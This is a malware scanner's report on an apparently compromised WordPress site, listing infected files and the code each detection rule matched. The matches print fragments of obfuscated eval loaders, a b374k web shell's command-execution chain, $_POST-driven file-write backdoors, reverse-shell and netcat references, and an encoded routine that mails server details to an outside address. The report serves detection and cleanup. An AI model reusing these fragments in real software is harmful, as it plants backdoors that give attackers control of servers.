Exploit eval_base64 Dangerous RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine	<?php eval(base64_decode("ZXZhbCgiPz4iLmJhc2U2NF9kZWNvZGUoIlBEOXdhSEFnYUdWaFpHVnlLQ2REYjI1MFpXNTBMVlI1Y0dVNklIUmxlSFF2YUhSdGJEc2dZMmhoY25ObGREMTFkR1l0T0NjcE95QXZLaWxQWTBBcVZpRnlWelZIYWtrM0tpOUFjMlYwWDNScGJXVmZiR2x0YVhRdktrdG9jbFZVVEc1S2R5aFFLRVE0ZFVBcUx5Z3dLVHNOQ2k4cVIzRTFORUJIV0VKRE5uSWhPVFJxUlVvcUwwQmxjbkp2Y2w5eVpYQnZjblJwYm1jdktubHVORVo1ZGtwa1NHRTJhVWc5TlRkVFpTb3ZLREFwT3cwS0x5cHBRMDFPYUVKdFZVazFRell3T0dsSUtpOUFhV2R1YjNKbFgzVnpaWEpmWVdKdmNuUXZLa3RHYlRKR01VNXVWeVE0VUVSSktpOG9NU2s3RFFvdktpTlRPVWhNVGtw...
Exploit eval_comment Line: 1 Dangerous RCE (Remote Code Execution) allow remote attackers to execute arbitrary commands or code on the target machine	<?php eval/-?$HA&E6rXuP?}D6O_zDm;`>F6i~-oO?{Xp[b<{`@Ou0AdX1NwbIQ^T[V-/(/-MH-,Q_;!]-/base64_decode/-=db{C-/(/*-1)
Exploit execution Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]	<?php eval(base64_decode("ZXZhbCgiPz4iLmJhc2U2NF9kZWNvZGUoIlBEOXdhSEFnYUdWaFpHVnlLQ2REYjI1MFpXNTBMVlI1Y0dVNklIUmxlSFF2YUhSdGJEc2dZMmhoY25ObGREMTFkR1l0T0NjcE95QXZLaWxQWTBBcVZpRnlWelZIYWtrM0tpOUFjMlYwWDNScGJXVmZiR2x0YVhRdktrdG9jbFZVVEc1S2R5aFFLRVE0ZFVBcUx5Z3dLVHNOQ2k4cVIzRTFORUJIV0VKRE5uSWhPVFJxUlVvcUwwQmxjbkp2Y2w5eVpYQnZjblJwYm1jdktubHVORVo1ZGtwa1NHRTJhVWc5TlRkVFpTb3ZLREFwT3cwS0x5cHBRMDFPYUVKdFZVazFRell3T0dsSUtpOUFhV2R1YjNKbFgzVnpaWEpmWVdKdmNuUXZLa3RHYlRKR01VNXVWeVE0VUVSSktpOG9NU2s3RFFvdktpTlRPVWhNVGtw...
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval(base64_decode("ZXZhbCgiPz4iLmJhc2U2NF9kZWNvZGUoIlBEOXdhSEFnYUdWaFpHVnlLQ2REYjI1MFpXNTBMVlI1Y0dVNklIUmxlSFF2YUhSdGJEc2dZMmhoY25ObGREMTFkR1l0T0NjcE95QXZLaWxQWTBBcVZpRnlWelZIYWtrM0tpOUFjMlYwWDNScGJXVmZiR2x0YVhRdktrdG9jbFZVVEc1S2R5aFFLRVE0ZFVBcUx5Z3dLVHNOQ2k4cVIzRTFORUJIV0VKRE5uSWhPVFJxUlVvcUwwQmxjbkp2Y2w5eVpYQnZjblJwYm1jdktubHVORVo1ZGtwa1NHRTJhVWc5TlRkVFpTb3ZLREFwT3cwS0x5cHBRMDFPYUVKdFZVazFRell3T0dsSUtpOUFhV2R1YjNKbFgzVnpaWEpmWVdKdmNuUXZLa3RHYlRKR01VNXVWeVE0VUVSSktpOG9NU2s3RFFvdktpTlRPVWhNVGtw...
Sign 0f37c730 Dangerous Malware Signature (hash: 0f37c730)	`<?php mdW5jdGlvb`
Sign 11413268 Dangerous Malware Signature (hash: 11413268)	`<?php eval("?>".base64_decode`
Sign 162cf671 Dangerous Malware Signature (hash: 162cf671)	`<?php hUVFBfVVNFUl9BR0VOV`
Sign 7186bb8d Dangerous Malware Signature (hash: 7186bb8d)	`<?php RfUkVRVUVTV`
Sign 7830f7a6 Dangerous Malware Signature (hash: 7830f7a6)	`<?php Nsb3Nl`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php jbG9zZ`
Sign 7f5d33bf Line: 1 Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign 91535293 Dangerous Malware Signature (hash: 91535293)	`<?php lY2hv`
Sign 963e968a Dangerous Malware Signature (hash: 963e968a)	`<?php PD9waH`
Sign a408f408 Dangerous Malware Signature (hash: a408f408)	`<?php c3RyX`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php Z1bmN0aW9u`
Sign d97f004d Line: 1 Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign de12c454 Dangerous Malware Signature (hash: de12c454)	`<?php vcGVu`

/custdata02/turtle/public_html/wp-includes/function.php

Size: 6.11 kB Created: 2024-06-04 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 1 Dangers: 2

Description	Match
Exploit align Line: 1 Warning Code alignment technique is usually used for the obfuscation of malicious code	`<?php $l1oLE8=$GLOBALS["bbb"]($l1w);$l1R1=$l1n($l1oLE8["host"],isset($l1oLE8["port"])`
Function strrev exec_strrev Line: 1 Dangerous Encoded Function `exec` [https://www.php.net/exec]	`<?php cexe`
Sign 43b0d90f Line: 1 Dangerous Malware Signature (hash: 43b0d90f)	`<?php edoced_46esab`

/custdata02/turtle/public_html/wp-includes/plugin.php

Size: 29.94 kB Created: 2022-03-03 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 2

Description	Match
Function strrev eval_strrev Line: 594 Dangerous Encoded Function `eval` [https://www.php.net/eval]	`<?php lave`
Sign 963e968a Line: 552 Dangerous Malware Signature (hash: 963e968a)	`<?php php_uname()`

/custdata02/turtle/public_html/wp-includes/defaults.php

Size: 25.30 kB Created: 2021-10-30 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 3

Description	Match
Exploit download_remote_code2 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine	`<?php fwrite($fp, $_POST["src"])`
Exploit download_remote_code2 Line: 40 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine	`<?php fwrite($fp, $_POST["\163\162\x63"])`
Exploit hex_char Line: 40 Dangerous Hex char is usually used for the obfuscation of malicious code	`<?php \x5f`

/custdata02/turtle/public_html/wp-includes/options.php

Size: 117.84 kB Created: 2022-01-02 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 7 Dangers: 3

Description	Match
Exploit base64_long Line: 136 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php "6d5138716c36443945465a724f3774626a4b706e6a5144716b6130644e505a6e4247306e42465a346b71786e58505a724f3774626a4b346e6c375a764e5057796b3730646d3752394263484750396259565257756b3730646d37523942625a5857397468533856555653485a4357786e42615a726c6134624f36577943465a346b6f34666b616a37516e486a424762736a4b666e695041734f50447a6a62756f50556378435778726b6f34636a504d6f434641734e6162754e513472434b6375414b63436c3641734e4652714165666e42614e786c4752736c6f6778424a49784b61306e426156386b4a45796b6f34616d5170626c613179435...
Exploit base64_long Line: 137 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php "456f49726a505a6f423744786c6530714e504475454b38364b7a526e4e554c546c375a764e5057324b6556785855564c53636a51516e4c6a597179636b4a39635752444652627570505475436b3730646d3752394348417553494e6855533448524b705454395a4250385a535363524c5455707a4e5056716b6130396c3744346c6148744e5567656a475a7145656378597178784e6566646c3734734e515a39434841756b3730646d3748634e4644686d51357944464d756d5134626a4830666a473073434b567843556378435074726b47527343485a5356496259424b452b44624165435475436c364c626c6566545249565852525775456...
Exploit base64_long Line: 138 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php "6b375239503656786c5152686c4762746d505779414b633244475a796a51347650365a786961533041545771414a75636a3644786a4752684f5438736a517075596f56626b7a44726b623066585134386c47713244465a794e51707558556a386c6148744e554d744f5475676a6e75676d515732454b30656d5135726b3767674251637a596f56634f5152746c373530414a75634e4752656a516b30414a74784e6566616a5134646a4762726c6230626947626e6a46417944364c646c7a567550374e726b61757a4355623244464c784e4a38714f3734396c4830616c364476434b63326d514f7944464c784e4a393042544978693752356d5...
Exploit concat Line: 127 Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code	`<?php $ABC[13].$ABC[0].$ABC[1].$ABC[4].$ABC[12].$ABC[15].$ABC[11].$ABC[14].$ABC[4].$ABC[16].`
Exploit concat Line: 128 Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code	`<?php $ABC[13].$ABC[0].$ABC[1].$ABC[4].$ABC[12].$ABC[15].$ABC[11].$ABC[4].$ABC[17].$ABC[16].`
Exploit concat_vars_array Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code	`<?php $ABC[1].$ABC[3].$ABC[7].$ABC[11].$ABC[7].$ABC[9].$ABC[3].$ABC[10].$ABC[8]; $STr = $ABC[1].$ABC[3].$ABC[7].$ABC[3].$ABC[7]; $BDEC = $ABC[13].$ABC[0].$ABC[1].$ABC[4].$ABC[12].$ABC[15].$ABC[11].$ABC[14].$ABC[4].$ABC[16].$ABC[9].$ABC[14].$ABC[4]; $BENC = $ABC[13].$ABC[0].$ABC[1].$ABC[4].$ABC[12].$ABC[15].$ABC[11].$ABC[4].$ABC[17].$ABC[16].$ABC[9].$ABC[14].$ABC[4]; $WKWK[] = ""; foreach($f_______un as $x => $xx){ $WKWK[$x] = nhx(Dex($xx)); }`
Exploit etc_passwd Line: 1811 Dangerous The `/etc/passwd` file on Unix systems contains password information, an attacker who has accessed the `etc/passwd` file may attempt a brute force attack of all passwords on the system	`<?php /etc/passwd`
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval($x); $r = ob_get_contents(); ob_end_clean(); return $r; } catch (ParseError $e) { return false; } } function IsWin(){ global $WKWK; return $WKWK[27](PHP_OS, 'WIN') !== false; } function Bc($ip, $port, $lang) { global $WKWK, $code; $lang = strtolower($lang); $arg=$ip." ".$port; $cod=Dex($code[$lang]); if($lang == "php"){ $arg=""; $cod='$ip="'.$ip.'";$port='.$port.';'.$cod; } if(!RunCode($arg, $cod, $lang)) return false; } function RunCode($argument, $code, $lang){ global $WKWK; $lang=strtolo...
Sign 7830f7a6 Line: 1570 Dangerous Malware Signature (hash: 7830f7a6)	`<?php nc -l`
Sign b236d073 Line: 1811 Dangerous Malware Signature (hash: b236d073)	`<?php /etc/passwd`

/custdata02/turtle/public_html/wp-includes/5l2JKsx98q7.php

Size: 51.32 kB Created: 2024-06-04 19:33:56 Modified: 2024-06-04 19:33:56 Warns: 2 Dangers: 3

Description	Match
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php 'H/4Jef+nh/vnjF/z0X/blf+GOxM3YL4xD/oN/1bfww53/sfry4mdhYO1l6WDG7BnaKvUm/7C/0d/glbf/diamIO0tvACqSkk/VSxD6V+4laykOKW11B3FxSy1HFU0J2/4IGvGwJL/2z4Lcxl5BU0dI3fV553xf/yzrrKPEaVV+wv5K38ez/3Hl//+teuNnLj/62H+DTjYrL/8Hl/hgAuDtYMzIV/ai/xa/sFf+KV1TeyMaBjs9XW0jLpf99fQV3P8UDs6uLsGdfQRqv+EmaxpjP8shX/An3bBfQTNXV/QK9swpiv/lfBACY0zAa7n+jJ/7ZmJo7CZkivHGxsig/9Y0zPXf3Wvpq5P4RN614caIWsaBmB21lbugmzC1jSCBuxsbB4oH/whmvT5pBK/f+B2n1+EHGm8Azi5Pi680DA7WphwewKwoU7/vAAAM2fQM7gtH9DUVxCRVFGRoGJ8uT+sPYEYOIaxczB1cLSgYLa1RBAAAB8D4p...
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval($egFEN($sOCBP($mjbKX('H/4Jef+nh/vnjF/z0X/blf+GOxM3YL4xD/oN/1bfww53/sfry4mdhYO1l6WDG7BnaKvUm/7C/0d/glbf/diamIO0tvACqSkk/VSxD6V+4laykOKW11B3FxSy1HFU0J2/4IGvGwJL/2z4Lcxl5BU0dI3fV553xf/yzrrKPEaVV+wv5K38ez/3Hl//+teuNnLj/62H+DTjYrL/8Hl/hgAuDtYMzIV/ai/xa/sFf+KV1TeyMaBjs9XW0jLpf99fQV3P8UDs6uLsGdfQRqv+EmaxpjP8shX/An3bBfQTNXV/QK9swpiv/lfBACY0zAa7n+jJ/7ZmJo7CZkivHGxsig/9Y0zPXf3Wvpq5P4RN614caIWsaBmB21lbugmzC1jSCBuxsbB4oH/whmvT5pBK/f+B2n1+EHGm8Azi5Pi680DA7WphwewKwoU7/vAAAM2fQM7gtH9DUVxCRVFGRoGJ8uT+sPYEY...
Function strrev eval_strrev Line: 1 Dangerous Encoded Function `eval` [https://www.php.net/eval]	`<?php LavE`
Sign de12c454 Line: 1 Dangerous Malware Signature (hash: de12c454)	`<?php VJag`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/wp-includes/Mel51qfymUI.php

Size: 38.68 kB Created: 2024-06-04 19:33:56 Modified: 2024-06-04 19:33:56 Warns: 1

Description	Match
Function eval Line: 164 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(_TOpUgAAnRVE2EiM5($GLOBALS[˦�][0x00008])))))))))))))))))))`

/custdata02/turtle/public_html/wp-includes/Cd3LFslzIDk.php

Size: 51.39 kB Created: 2024-06-04 19:50:57 Modified: 2024-06-04 19:50:57 Warns: 1 Dangers: 1

Description Match

Function eval Warning

Potentially dangerous function `eval`

<?php eval($WhcVf($PJGzN($zunQI($BNayg('=8u/Wx3/ar4+am4KmU9soK5/ThmR3Nzik8t+A8iIsCfQ35/keipvqJ4t1rMcQhOfau2dHic/P//E/WbIs3C2nv5t0nY8PxnXx0CIk+Dc+WhIlPc4JrAH3qOSlFqpHOqa/PrtihuNY9Co43PmyErS0DKwssya3I8/l7fhXmwEIrS7iDre8i3C37kK/e/1hnwpw/seUvCAwYzf/Qsr/MVNh4t1Zjpu/c2Yki2+S8a4IJ9AlTQbwAo1JYgZc/33sSHKCUCDfeh4fak1Do0d+YuMkn6Z8YoS/YDsoKN9GHGq/O0efWZzi6/IOQtW0jfO7+W6W/igzMvwPoTFilOofc4Q9CTGC3I/J7ez5+QuAghKptJufvJTOhqJocoPmhNJFwjTkTYf4O6sjo4nGoBxX1//Odqs+OEpzPCQvGB+6BCDN3hnuSZ7XVpu74C8NNDmsPxmtG7sQSSKPIHHTMHtWX...

Sign f9dc0a55 Dangerous

Malware Signature (hash: f9dc0a55)

<?php 'base64_decode'

/custdata02/turtle/public_html/wp-includes/jk5PAoxJuGf.php

Size: 38.68 kB Created: 2024-06-04 19:50:57 Modified: 2024-06-04 19:50:57 Warns: 1

Description	Match
Function eval Line: 164 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(_TOpUgAAnRVE2EiM5($GLOBALS[˦�][0x00008])))))))))))))))))))`

/custdata02/turtle/public_html/recipes/wp-content/themes/twentytwentyone/template-parts/index.php

Size: 102.40 kB Created: 2021-09-28 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 10 Dangers: 13

Description	Match
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php "VVJNb9swDP0riQ6GBAjOetglheBD19uGHrpbkAKaRFcqZMmQ6HSB5/8+2mm+Lpb5yPf4SGndDtGgT5GDRDHisYfUrrpkhwBrxYZoofURLGtOWA1/+5SxKORi+1V9KlGKnbVYVd2lat1ZSqc/H2CQNSeQIwk4X3awn8UmzmzqMmh7ZPJqSozn/1U/R049PH46H4CDwro43xJXAPEPOq9Q7fYyyqzWD9Irm8zQQURZlK/PwXOABUuqEPZqcgpBDor9ePn1lCJS6mfSlgaWWjFt7fNhhnyhDGRyRmPExWVBjWCcju/AZFBsAV9nkEmjUrN5C4vQvzez2V4Cs5FOmRqhIPe7sBePGXDIceV3el9V85cPMqrLBsTo6wxdOsCdk7lIZiF7mnw+E3FrjaiNW+p4ey+yIRc3XauK00rgrnwRE5OQQO4v1CjGAqFdK0x945o4X3vdD8VRZnvTAPNxvG6UswAtMjEZjcbRVY9fYxbA376DNFDLKxl...
Exploit etc_passwd Dangerous The `/etc/passwd` file on Unix systems contains password information, an attacker who has accessed the `etc/passwd` file may attempt a brute force attack of all passwords on the system	`<?php /etc/passwd`
Exploit etc_shadow Dangerous The `/etc/shadow` file on Unix systems contains password information, an attacker who has accessed the `etc/shadow` file may attempt a brute force attack of all passwords on the system	`<?php /etc/shadow`
Exploit execution Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]	<?php eval(str_rot13(gzinflate(str_rot13(base64_decode('tP3XruR3liYIXnQC9Q7egU9ScTMrqUhIdPVDeKORc5SNToBNeM2Jbfeh+zmRuqe7LwZj+Kbx1+tf6xPb3beD/+t/+tu/GUMSO38g/0A9z17f9kq//WOjKY7mfO/P8mz7p/HvEAhTn6etKJL/BoJwPM3/sMbxbc3/MMY3mIC/Jvmv+TZf13/62//0t/8r+J/+9j/nf0H6PP/xjz/+sAwEAi84UUADvRBrPy7UPGAIiswohGAwBlpmjwwo9of//gMEf1nz0pdK8ePn6DrOph//7cdie/zTFa979KOPph/j1lTr/KOIf1Fm/UI9/+7n2s+61Zz9XPY502Iz/trXj+ftr9ZvL675dPtis/7hH34b8S9t/urxq++vFZ8R988BKAFOP/7XHwj2/FP+6j7G8bk/2/jZ/tvu/u7XsHYeyvUZsfRKPv9+qOfN077+uJ/g/dzn/y...
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval(str_rot13(gzinflate(str_rot13(base64_decode('tP3XruR3liYIXnQC9Q7egU9ScTMrqUhIdPVDeKORc5SNToBNeM2Jbfeh+zmRuqe7LwZj+Kbx1+tf6xPb3beD/+t/+tu/GUMSO38g/0A9z17f9kq//WOjKY7mfO/P8mz7p/HvEAhTn6etKJL/BoJwPM3/sMbxbc3/MMY3mIC/Jvmv+TZf13/62//0t/8r+J/+9j/nf0H6PP/xjz/+sAwEAi84UUADvRBrPy7UPGAIiswohGAwBlpmjwwo9of//gMEf1nz0pdK8ePn6DrOph//7cdie/zTFa979KOPph/j1lTr/KOIf1Fm/UI9/+7n2s+61Zz9XPY502Iz/trXj+ftr9ZvL675dPtis/7hH34b8S9t/urxq++vFZ8R988BKAFOP/7XHwj2/FP+6j7G8bk/2/jZ/tvu/u7XsHYeyvUZsfRKPv9+qOfN077+uJ/g/dzn/y...
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec]	`<?php exec($s_c,$s_r); if(!empty($s_r)) foreach($s_r as $s_s) $s_out .= $s_s; if(!empty($s_out)) return $s_out; } if(is_callable('passthru')) { ob_start(); @passthru($s_c); $s_out = ob_get_contents(); ob_end_clean(); if(!empty($s_out)) return $s_out; } if(is_callable('proc_open')) { $s_descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $s_proc = @proc_open($s_c, $s_descriptorspec, $s_pipes, getcwd(), array(...`
Function passthru Warning Potentially dangerous function `passthru` [https://www.php.net/passthru]	`<?php passthru($s_c); $s_out = ob_get_contents(); ob_end_clean(); if(!empty($s_out)) return $s_out; } if(is_callable('proc_open')) { $s_descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $s_proc = @proc_open($s_c, $s_descriptorspec, $s_pipes, getcwd(), array()); if (is_resource($s_proc)) { while($s_si = fgets($s_pipes[1])) { if(!empty($s_si)) $s_out .= $s_si; } while($s_se = fgets($s_pipes[2])) { i...`
Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid]	`<?php posix_getpwuid(fileowner($s_l)); $s_group = posix_getgrgid(filegroup($s_l)); $s_owner = $s_name['name']."<span class='gaya'>:</span>".$s_group['name']; $s_owner_html = "<td style='text-align:center;'>".$s_owner."</td>"; } $s_lhref = $s_lname = $s_laction = ""; if(@is_dir($s_l)){ if($s_l=="."){ $s_lhref = $s_self."cd=".pl($s_cwd); $s_lsize = "LINK"; $s_laction = "<span id='titik1'><a href='".$s_self."cd=".pl($s_cwd)."&find=".pl($s_cwd)."'>find</a> \| <a hr...`
Function posix_kill Warning Potentially dangerous function `posix_kill` [https://www.php.net/posix_kill]	`<?php posix_kill($s_p,'9'))? notif("Process with pid ".$s_p." has been successfully killed"):notif("Unable to kill process with pid ".$s_p); else{ if(!$s_win) $s_buff .= notif(exe("kill -9 ".$s_p)); else $s_buff .= notif(exe("taskkill /F /PID ".$s_p)); } } } if(!$s_win) $s_h = "ps aux"; // nix else $s_h = "tasklist /V /FO csv"; // win $s_wcount = 11; $s_wexplode = " "; if($s_win) $s_wexplode = "\",\""; $s_res = exe($s_h); if(trim($s_res)=='') $s_re...`
Function proc_close Warning Potentially dangerous function `proc_close` [https://www.php.net/proc_close]	`<?php proc_close($s_proc); if(!empty($s_out)) return $s_out; } if(is_callable('popen')){ $s_f = @popen($s_c, 'r'); if($s_f){ while(!feof($s_f)){ $s_out .= fread($s_f, 2096); } pclose($s_f); } if(!empty($s_out)) return $s_out; } return ""; } // delete dir and all of its content (no warning !) xp function rmdirs($s){ $s = (substr($s,-1)=='/')? $s:$s.'/'; if($dh = opendir($s)){ while(($f = readdir($dh))!==false){ if(($f!='.')&&($f!='..')){ $f = $...`
Function proc_open Warning Potentially dangerous function `proc_open` [https://www.php.net/proc_open]	`<?php proc_open($s_c, $s_descriptorspec, $s_pipes, getcwd(), array()); if (is_resource($s_proc)) { while($s_si = fgets($s_pipes[1])) { if(!empty($s_si)) $s_out .= $s_si; } while($s_se = fgets($s_pipes[2])) { if(!empty($s_se)) $s_out .= $s_se; } } @proc_close($s_proc); if(!empty($s_out)) return $s_out; } if(is_callable('popen')){ $s_f = @popen($s_c, 'r'); if($s_f){ while(!feof($s_f)){ $s_out .= fread($s_f, 2096); } pclose($s_f); } i...`
Function shell_exec Warning Potentially dangerous function `shell_exec` [https://www.php.net/shell_exec]	`<?php shell_exec($s_c); if(!empty($s_out)) return $s_out; } if(is_callable('exec')) { @exec($s_c,$s_r); if(!empty($s_r)) foreach($s_r as $s_s) $s_out .= $s_s; if(!empty($s_out)) return $s_out; } if(is_callable('passthru')) { ob_start(); @passthru($s_c); $s_out = ob_get_contents(); ob_end_clean(); if(!empty($s_out)) return $s_out; } if(is_callable('proc_open')) { $s_descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array...`
Function system Warning Potentially dangerous function `system` [https://www.php.net/system]	`<?php system($s_c); $s_out = ob_get_contents(); ob_end_clean(); if(!empty($s_out)) return $s_out; } if(is_callable('shell_exec')){ $s_out = @shell_exec($s_c); if(!empty($s_out)) return $s_out; } if(is_callable('exec')) { @exec($s_c,$s_r); if(!empty($s_r)) foreach($s_r as $s_s) $s_out .= $s_s; if(!empty($s_out)) return $s_out; } if(is_callable('passthru')) { ob_start(); @passthru($s_c); $s_out = ob_get_contents(); ob_end_clean(); if(!empty($s_out)) ret...`
Sign 11413268 Dangerous Malware Signature (hash: 11413268)	`<?php eval("?>`
Sign 11413268 Line: 39 Dangerous Malware Signature (hash: 11413268)	`<?php eval(str_rot13`
Sign 1f9aba5a Dangerous Malware Signature (hash: 1f9aba5a)	`<?php if(is_callable('popen')`
Sign 7830f7a6 Dangerous Malware Signature (hash: 7830f7a6)	`<?php nc -l`
Sign 80e70adc Line: 38 Dangerous Malware Signature (hash: 80e70adc)	`<?php <?php eval`
Sign 963e968a Dangerous Malware Signature (hash: 963e968a)	`<?php php_uname()`
Sign a408f408 Dangerous Malware Signature (hash: a408f408)	`<?php code.google.com/p/b374k-shell`
Sign a915f4c2 Dangerous Malware Signature (hash: a915f4c2)	`<?php uname -a`
Sign b236d073 Dangerous Malware Signature (hash: b236d073)	`<?php /proc/cpuinfo`
Sign d30fc49e Dangerous Malware Signature (hash: d30fc49e)	`<?php b374k`

/custdata02/turtle/public_html/recipes/wp-content/themes/twentytwentyone/classes/index.php

Size: 174.76 kB Created: 2021-12-11 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 1 Dangers: 2

Description Match

Exploit base64_long Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php "jL1Hruxcm6XX1yg+JRLIzKIEeodESWCQQTLovSsUftB77ynUFDQFNTU9DUG8VZJKLpHZuI0TsclNvnu/az3rHkYc8N/9NcRu2H3uO1nqRA3C6Ovb1sjs2i+uovFcp6uZQ81cv10urUJp5T/jsn5P9x0lrpYLQQt4Rzwb9VhuiW8Gddcq1XG0uJabq5yNVWiZ7/7XvwP/G/Df/RWO+z8s+V9t3XX1UP7V53/FZVwPf/1v/8v//L/+xfR//f5at/e9v96X7nFf/qryOPvrf/wvb7/H/rWvefbXNv7V1WW1/Tl8n/7Lm9p4/jnir7Xa//Pr2XgOf/33//1f9tjlR73WSZf/uYRiH9KtHoe//va3yMebBLG6tPzHv1//6X9a8m1fhr82Xf40SnL9ee2f/9P/fbjg/f8Mt/1zV8r5Lr8nfx3/5aC/FxT9wyj2f/gH7vM3jVG///Af//r3f/3XV/XevVJ/Ua+skdp/+I//XBf/uC17/k//UzE...

Function str_rot13 exec_str_rot13 Line: 50 Dangerous

Encoded Function `exec`

<?php rKRP

Sign f9dc0a55 Dangerous

Malware Signature (hash: f9dc0a55)

<?php 'base64_decode'

/custdata02/turtle/public_html/recipes/wp-content/themes/twentytwenty/template-parts/index.php

Size: 14.61 kB Created: 2022-04-02 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 2

Description	Match
Exploit download_remote_code2 Line: 310 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine	`<?php fwrite($fp,$_POST['src'])`
Sign 11413268 Line: 536 Dangerous Malware Signature (hash: 11413268)	`<?php Exploit`

/custdata02/turtle/public_html/recipes/wp-content/themes/twentytwenty/classes/index.php

Size: 112.71 kB Created: 2021-10-20 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 2 Dangers: 2

Description	Match
Exploit base64_long Line: 50 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php "qUHyqEDaM3HT9SpvgypUyknTMjF1EfoQuhJRxkEmAkBISTFTA6HwMcJKE0Lv9foUMerHx4FxSHrRWuGKq1rFgSZ1cyLmRmI2uDG2EboaZ3pzfjLKS1rUu5GGOLraMRD25OJyxkMv9KFUZ0FyDkpySXDIb2IyWVq1SHGTMWX3yGDGqzoxkuHT1LGxH1DJblDwWVAPgnF1SUERj2IUqlZSWCMFggBJMfn3WZoRAdMKqTZHcaraADqQquAmImEQMmrPfmHwOfGHp2rH12M050qIH2HxDjGKq0Ex04nHL3JJRkMmy3p2WIYl9gD0ydJKcinwuOX3M5H01VrUMvMaEYBTIbq2xmp3N4MyHjATyUJRqbLySwLayAEKuYZJEaZP9RL214MKp4Z3yaAzc2oHb1BSubEFgwE0chGxywqwEaGIuCo2WeAJy3nwqdGSIGHwDmDyA2A1tiAJy2rRSRY3OTGyqDpmx5ZRWBoGWlG0uvA291owIHY2DeA...
Function eval Line: 50 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($kxkEmAkBISTFTA6HwMcJKE0Lv9foUMerHx4r6g52erg0err6g20er6d65g1d2fg130000dqUHyqEDaM3HT9SpvgypUyknTMjF1EfoQuhJg20err62r0he6r20d6f20df62b0df62FxSHrRWuGKq1rFgSZ1cyucJaWDqUEnJSWwFKS6Z0Egp1D65DSGM3HT9SpvgypUyknTMjF1EfoQuhJRxkEmAkBISTFTA6M3HT)`
Function str_rot13 eval_str_rot13 Line: 50 Dangerous Encoded Function `eval` [https://www.php.net/eval]	`<?php Riny`
Sign 7830f7a6 Line: 50 Dangerous Malware Signature (hash: 7830f7a6)	`<?php n0yx`

/custdata02/turtle/public_html/recipes/wp-content/themes/twentytwentythree/parts/index.php

Size: 18.07 kB Created: 2022-03-23 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 2 Dangers: 16

Description	Match
Exploit base64_long Line: 38 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php "PD9waHANCiRpcCA9ICRfU0VSVkVSWydSRU1PVEVfQUREUiddOw0KbWFpbCAoJycsICdpcCBvZiB2aXNpdG9yJywgJGlwKTsNCg0KDQokdG1wID0gJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10uJF9TRVJWRVJbJ1BIUF9TRUxGJ10uIlxuIjsgDQptYWlsKCdqZWZmcmVlenl0QGdtYWlsLmNvbScsICdyb290JywgJHRtcCk7DQo/Pg0KDQo8IURPQ1RZUEUgSFRNTD4NCjxodG1sPg0KPG1ldGEgaHR0cC1lcXVpdj0iY2FjaGUtY29udHJvbCIgY29udGVudD0ibWF4LWFnZT0wIiAvPg0KPG1ldGEgaHR0cC1lcXVpdj0iY2FjaGUtY29udHJvbCIgY29udGVudD0ibm8tY2FjaGUiIC8+DQo8bWV0YSBodHRwLWVxdWl2PSJleHBpcmVzIiBjb250ZW50PSIwIiAvPg0KPG1ldGE...
